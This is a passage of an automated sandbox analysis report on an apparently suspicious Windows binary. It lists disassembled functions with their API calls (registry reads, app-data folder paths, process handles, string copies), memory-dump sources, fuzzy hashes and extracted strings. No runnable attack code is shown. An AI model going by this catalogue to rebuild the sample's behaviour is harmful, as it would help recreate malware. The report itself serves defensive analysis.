                          • RegQueryValueExA.ADVAPI32(?,00F2DB60,00000000,00000000,00000000,000000FF), ref: 003C31A7
                          • RegCloseKey.ADVAPI32(?), ref: 003C31B1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: bdce97dd0bc55eb946be814c63f55e72626b31143d8e3ca32728633cd36c460a
                          • Instruction ID: 44cefacba30b8f5224f42a931e8aff94361afa918c2c3d07401da217509f8c87
                          • Opcode Fuzzy Hash: bdce97dd0bc55eb946be814c63f55e72626b31143d8e3ca32728633cd36c460a
                          • Instruction Fuzzy Hash: 24113076A41205AFD720DB94EC49FBBB7BCE744711F00411BFA05D3780DB75590487A1
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: String___crt$Type
                          • String ID:
                          • API String ID: 2109742289-3916222277
                          • Opcode ID: 1c8a84d22a10cebf6fdc7c6d3ffffcd452b474a7546f0bb48cf9a640861f8c2a
                          • Instruction ID: 7d518d458d5d57f4a1567170459217ccbe169b569627c46bf667cb9714126439
                          • Opcode Fuzzy Hash: 1c8a84d22a10cebf6fdc7c6d3ffffcd452b474a7546f0bb48cf9a640861f8c2a
                          • Instruction Fuzzy Hash: F541E67050479CAEDB229B248C89FFB7BFC9B45704F1948EDE9C6C6182E2719E458F20
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 003A8996
                            • Part of subcall function 003CA1C0: std::exception::exception.LIBCMT ref: 003CA1D5
                            • Part of subcall function 003CA1C0: std::exception::exception.LIBCMT ref: 003CA1FB
                          • std::_Xinvalid_argument.LIBCPMT ref: 003A89CD
                            • Part of subcall function 003CA173: std::exception::exception.LIBCMT ref: 003CA188
                            • Part of subcall function 003CA173: std::exception::exception.LIBCMT ref: 003CA1AE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: invalid string position$string too long
                          • API String ID: 2002836212-4289949731
                          • Opcode ID: be23203c31aa878bda7effb2749846524dd418e2a752d1619fe844424a1b7f00
                          • Instruction ID: ab6f294821f1f4516f4056395a8e64c80d4985df012494e1b2c0e0fd6a93fd93
                          • Opcode Fuzzy Hash: be23203c31aa878bda7effb2749846524dd418e2a752d1619fe844424a1b7f00
                          • Instruction Fuzzy Hash: DE21E5733006508BC722DB5CE840A6AF7A9DFA27A1B150A3FF182CB281DB71DC41C3A5
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 003A8883
                            • Part of subcall function 003CA173: std::exception::exception.LIBCMT ref: 003CA188
                            • Part of subcall function 003CA173: std::exception::exception.LIBCMT ref: 003CA1AE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: vector<T> too long$yxxx$yxxx
                          • API String ID: 2002836212-1517697755
                          • Opcode ID: 88efedb43114f4c39f0cec306d96e024b2ce36c4ca6ab497cd9bb7a26c187bac
                          • Instruction ID: 085686569cf701ecbbf3527fde699c4a91dd16e26dc0f146c1cf73b9aaaae2cb
                          • Opcode Fuzzy Hash: 88efedb43114f4c39f0cec306d96e024b2ce36c4ca6ab497cd9bb7a26c187bac
                          • Instruction Fuzzy Hash: 3431BBB5E005199FCB09DF58C891AAEBBB6EB89350F14C269E915EF344DB30AD01CBD1
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 003C5922
                            • Part of subcall function 003CA173: std::exception::exception.LIBCMT ref: 003CA188
                            • Part of subcall function 003CA173: std::exception::exception.LIBCMT ref: 003CA1AE
                          • std::_Xinvalid_argument.LIBCPMT ref: 003C5935
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_std::exception::exception
                          • String ID: Sec-WebSocket-Version: 13$string too long
                          • API String ID: 1928653953-3304177573
                          • Opcode ID: 31591294e376b63b9f228590d8d658965982774c12a25b2f3cb86ecc1e09aa72
                          • Instruction ID: 714d3f0871b7fca094d0cd9fa2b262cbfae5ee96a963f2cbe686aa1769c2a770
                          • Opcode Fuzzy Hash: 31591294e376b63b9f228590d8d658965982774c12a25b2f3cb86ecc1e09aa72
                          • Instruction Fuzzy Hash: 4F113031318B40CBC7238B2CE800F19B7E5ABA2761F250A9EE0D1CB695D771EC81C7A5
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,003CA430,000000FF), ref: 003C3D20
                          • RtlAllocateHeap.NTDLL(00000000), ref: 003C3D27
                          • wsprintfA.USER32 ref: 003C3D37
                            • Part of subcall function 003C71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003C71FE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesslstrcpywsprintf
                          • String ID: %dx%d
                          • API String ID: 1695172769-2206825331
                          • Opcode ID: f8d5771695f54a3e82fddb54cf191e20c78b489ceb1abd3589bddb5995600c9a
                          • Instruction ID: 4f5632998549ed6e9afdc33ee3dbd1c870272b39c954c1ad3afa91acad00b504
                          • Opcode Fuzzy Hash: f8d5771695f54a3e82fddb54cf191e20c78b489ceb1abd3589bddb5995600c9a
                          • Instruction Fuzzy Hash: A401AD71642604BFE7209B54AC0EF6ABB68FB55B62F004117FA05D72D0D6B41D04DBA2
                          APIs
                          • __getptd.LIBCMT ref: 003C9279
                            • Part of subcall function 003C87FF: __amsg_exit.LIBCMT ref: 003C880F
                          • __amsg_exit.LIBCMT ref: 003C9299
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __amsg_exit$__getptd
                          • String ID: Xu=$Xu=
                          • API String ID: 441000147-3369541160
                          • Opcode ID: 1d30c1069b51a6b3d83af0881e69368d4775e4558203dc5c46163bf17658d43c
                          • Instruction ID: 9f2bb152c2d96b70711cc89bcb495389e998128c6fb4732c92f525bfafa52203
                          • Opcode Fuzzy Hash: 1d30c1069b51a6b3d83af0881e69368d4775e4558203dc5c46163bf17658d43c
                          • Instruction Fuzzy Hash: F6018433906725ABD623AB69A80AF9DB3546F01B10F57040FE884EB690DB346D41CBD5
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 003A8737
                            • Part of subcall function 003CA173: std::exception::exception.LIBCMT ref: 003CA188
                            • Part of subcall function 003CA173: std::exception::exception.LIBCMT ref: 003CA1AE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: vector<T> too long$yxxx$yxxx
                          • API String ID: 2002836212-1517697755
                          • Opcode ID: 40a3e08a83e48af540604f2c1f0cfc64a9bd54b6c360b52c3d86bbfadb7902f7
                          • Instruction ID: 5a76f98d01e3efc5b547228f86aafedfa7f12455862252d3672263eb84a19b8a
                          • Opcode Fuzzy Hash: 40a3e08a83e48af540604f2c1f0cfc64a9bd54b6c360b52c3d86bbfadb7902f7
                          • Instruction Fuzzy Hash: E3F0B437F000220F8316663D9D8449EA94BD7E639033AD735E81AEF359DC72EC8295D4
                          APIs
                            • Part of subcall function 003C781C: __mtinitlocknum.LIBCMT ref: 003C7832
                            • Part of subcall function 003C781C: __amsg_exit.LIBCMT ref: 003C783E
                          • ___addlocaleref.LIBCMT ref: 003C8756
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ___addlocaleref__amsg_exit__mtinitlocknum
                          • String ID: KERNEL32.DLL$Xu=$xt=
                          • API String ID: 3105635775-3214832763
                          • Opcode ID: 7b209e20a5d05635be71e2d36177b32122372c02795e5c78c7ebec4c85a63a4e
                          • Instruction ID: 626212b4d57ae5b6014f7cc2671d3c36af4201046b184b833e73c0292434af51
                          • Opcode Fuzzy Hash: 7b209e20a5d05635be71e2d36177b32122372c02795e5c78c7ebec4c85a63a4e
                          • Instruction Fuzzy Hash: 5E01C871445B009ED722AF75D806B49F7E0AF01314F20890EE5DA9B2E0CFB4AE04CF11
                          APIs
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003BE544
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BE573
                          • lstrcat.KERNEL32(?,00000000), ref: 003BE581
                          • lstrcat.KERNEL32(?,00F2DB40), ref: 003BE59C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FolderPathlstrcpy
                          • String ID:
                          • API String ID: 818526691-0
                          • Opcode ID: 5bf4a78a507bd46f53122f53b4e67530e558deeecae83e83631280b2cf888589
                          • Instruction ID: 92e10b396c5fcdca38295eadc11e64b74d27b15023909152834c9150966c188a
                          • Opcode Fuzzy Hash: 5bf4a78a507bd46f53122f53b4e67530e558deeecae83e83631280b2cf888589
                          • Instruction Fuzzy Hash: B351B975A11108AFD766EB58DC52EFE33BDEB59300F04445FFA068B251EE70AE448B91
                          APIs
                          Strings
                          • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 003C1FDF, 003C1FF5, 003C20B7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: strlen
                          • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                          • API String ID: 39653677-4138519520
                          • Opcode ID: 9944943ed3be9d4b130bc3aaf7d3347dfb35e7b53d611036a26b018f73c8c932
                          • Instruction ID: c53bebad6cb257fd64ce34044355ea77d33e112d3ba648cd8d1a7443c17855d6
                          • Opcode Fuzzy Hash: 9944943ed3be9d4b130bc3aaf7d3347dfb35e7b53d611036a26b018f73c8c932
                          • Instruction Fuzzy Hash: 32215A395102A98FC722EB35D444BDEF36ADF80362F85445BC8188B691E3321D0ED796
                          APIs
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003BEBB4
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BEBE3
                          • lstrcat.KERNEL32(?,00000000), ref: 003BEBF1
                          • lstrcat.KERNEL32(?,00F2EBC0), ref: 003BEC0C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FolderPathlstrcpy
                          • String ID:
                          • API String ID: 818526691-0
                          • Opcode ID: 9e96703509a97e90a9ecdf39b01e911218035d119166564a23acb0f05af3d9fb
                          • Instruction ID: 7f3a32c39b25982d8678ae7e40ba3b3396b8a9f14baa0e1e10a64143a56ca827
                          • Opcode Fuzzy Hash: 9e96703509a97e90a9ecdf39b01e911218035d119166564a23acb0f05af3d9fb
                          • Instruction Fuzzy Hash: 5E31A771A1111DABCB26EF68EC46BEE73B4FF59300F1004A9FA06DB250DE309E548B90
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,003CA3D0,000000FF), ref: 003C2B8F
                          • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 003C2B96
                          • GetLocalTime.KERNEL32(?,?,00000000,003CA3D0,000000FF), ref: 003C2BA2
                          • wsprintfA.USER32 ref: 003C2BCE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateLocalProcessTimewsprintf
                          • String ID:
                          • API String ID: 377395780-0
                          • Opcode ID: 4eaca5bac3beafca8ca9a7cc3981feb7892f161a442acc30255686f5b7cc3fe8
                          • Instruction ID: 50c9d53067ce8743c2a412729a12d690e1b25f8732a10dd77b1f38833ce7fcf4
                          • Opcode Fuzzy Hash: 4eaca5bac3beafca8ca9a7cc3981feb7892f161a442acc30255686f5b7cc3fe8
                          • Instruction Fuzzy Hash: BD0140B2905528ABCB249BC9ED49FBEB7BCFB4CB11F00011BF605A2280E7785944D7B1
                          APIs
                          • OpenProcess.KERNEL32(00000410,00000000), ref: 003C4492
                          • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 003C44AD
                          • CloseHandle.KERNEL32(00000000), ref: 003C44B4
                          • lstrcpy.KERNEL32(00000000,?), ref: 003C44E7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                          • String ID:
                          • API String ID: 4028989146-0
                          • Opcode ID: 471034931392acd604d3bf6d556fccaaaa1f7d4ab7d0117f46f6b67f03b2c72c
                          • Instruction ID: 67c9dc5db1c20fee1fe5572560985c19a8ca693f60ff2312eec9c378d7cd3dec
                          • Opcode Fuzzy Hash: 471034931392acd604d3bf6d556fccaaaa1f7d4ab7d0117f46f6b67f03b2c72c
                          • Instruction Fuzzy Hash: F6F0FCB09026256BE7319B759C4DFE6BBA8EF14704F154596FA45D7180DBB08C84C790
                          APIs
                          • __getptd.LIBCMT ref: 003C8FDD
                            • Part of subcall function 003C87FF: __amsg_exit.LIBCMT ref: 003C880F
                          • __getptd.LIBCMT ref: 003C8FF4
                          • __amsg_exit.LIBCMT ref: 003C9002
                          • __updatetlocinfoEx_nolock.LIBCMT ref: 003C9026
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                          • String ID:
                          • API String ID: 300741435-0
                          • Opcode ID: 3d484e27bc346d84ff5585e2c1d019c7adbb183f8efd2c4a05adc2485b8cc69c
                          • Instruction ID: 47b069dccb6aaadb00da2d67ddb93ad3a493a40d977688b67255959da34a0fe6
                          • Opcode Fuzzy Hash: 3d484e27bc346d84ff5585e2c1d019c7adbb183f8efd2c4a05adc2485b8cc69c
                          • Instruction Fuzzy Hash: 55F062329097209BD663BB78680BF5923A16F00711F26420EF545EE2D2DF645D00DB55
                          APIs
                          • lstrlen.KERNEL32(------,003A5BEB), ref: 003C731B
                          • lstrcpy.KERNEL32(00000000), ref: 003C733F
                          • lstrcat.KERNEL32(?,------), ref: 003C7349
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                           • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcatlstrcpylstrlen
                          • String ID: ------
                          • API String ID: 3050337572-882505780
                          • Opcode ID: f43f2035b07834af3e24ffd992d2bcca7dba50f10d04685ddd864cdee355e05b
                          • Instruction ID: 782eb9f6476e79ccbe698a43ba246d0a9778d5a71051869c55c72566ee9e974c
                          • Opcode Fuzzy Hash: f43f2035b07834af3e24ffd992d2bcca7dba50f10d04685ddd864cdee355e05b
                          • Instruction Fuzzy Hash: 2EF039789013029FCB269F35DC48A27BBF9EF94B00318882EAC9AC7214EB30D840DF50
                          APIs
                            • Part of subcall function 003A1530: lstrcpy.KERNEL32(00000000,?), ref: 003A1557
                            • Part of subcall function 003A1530: lstrcpy.KERNEL32(00000000,?), ref: 003A1579
                            • Part of subcall function 003A1530: lstrcpy.KERNEL32(00000000,?), ref: 003A159B
                            • Part of subcall function 003A1530: lstrcpy.KERNEL32(00000000,?), ref: 003A15FF
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B3422
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B344B
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B3471
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B3497
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                           • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
